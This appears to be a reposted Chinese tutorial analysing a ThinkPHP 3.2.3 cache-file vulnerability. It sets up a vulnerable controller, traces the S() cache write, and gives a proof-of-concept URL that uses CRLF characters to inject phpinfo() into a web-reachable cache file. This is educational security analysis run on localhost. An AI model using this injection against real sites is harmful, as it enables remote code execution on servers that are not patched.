PHP教程

thinkphp3缓存漏洞

本文主要是介绍thinkphp3缓存漏洞,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

配置控制器Application/Home/Controller/IndexController.class.php

<?php
namespace Home\Controller;

use Think\Controller;

class IndexController extends Controller
{
    public function index(){
        $data=I('get.data');
        S('data',$data);
    }
}

我们在浏览器访问http://127.0.0.1/thinkphp-3.2.3/?data=spring

发现生成缓存文件Application/Runtime/Temp/8d777f385d3dfec8815d20f7496026dc.php

缓存文件的名称8d777f385d3dfec8815d20f7496026dc就是S('data',$data);data的MD5

代码分析

打断点进入S()方法

跟进写缓存部分的代码return $cache->set($name, $value, $expire);

文件名来自filename()函数,在有源码的情况下这是已知的

$data来自序列化之后的$value$value可控

$data = serialize($value);

现在的$data"s:6:"spring";"

接下来的这段代码是写入文件的关键

$data   = "<?php\n//" . sprintf('%012d', $expire) . $check . $data . "\n?>";
$result = file_put_contents($filename, $data);

这里使用了file_put_contents()函数,另外写入的部分用了//注释符防止其被解析,但我们可以使用换行符等进行绕过

所以最终我们的POC为http://127.0.0.1/thinkphp-3.2.3/?data=%0d%0aphpinfo();%0d%0a//

0x0d - \r, carrige return 回车
0x0a - \n, new line 换行
Windows 中换行为0d 0a
UNIX 换行为 0a

因为ThinkPHP3的入口文件位于根目录下,和 application 等目录在同一目录下,导致系统很多文件都可以访问,跟日志泄露一样,这里生成的缓存文件也是可以直接访问的

访问http://127.0.0.1/thinkphp-3.2.3/Application/runtime/Temp/8d777f385d3dfec8815d20f7496026dc.php可见

缓存文件内容为

<?php
//000000000000s:16:"
phpinfo();
//";
?>

参考链接

  • https://www.freebuf.com/vuls/282906.html
  • https://zhuanlan.zhihu.com/p/28554803

END

建了一个微信的安全交流群,欢迎添加我微信备注进群,一起来聊天吹水哇,以及一个会发布安全相关内容的公众号,欢迎关注

这篇关于thinkphp3缓存漏洞的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!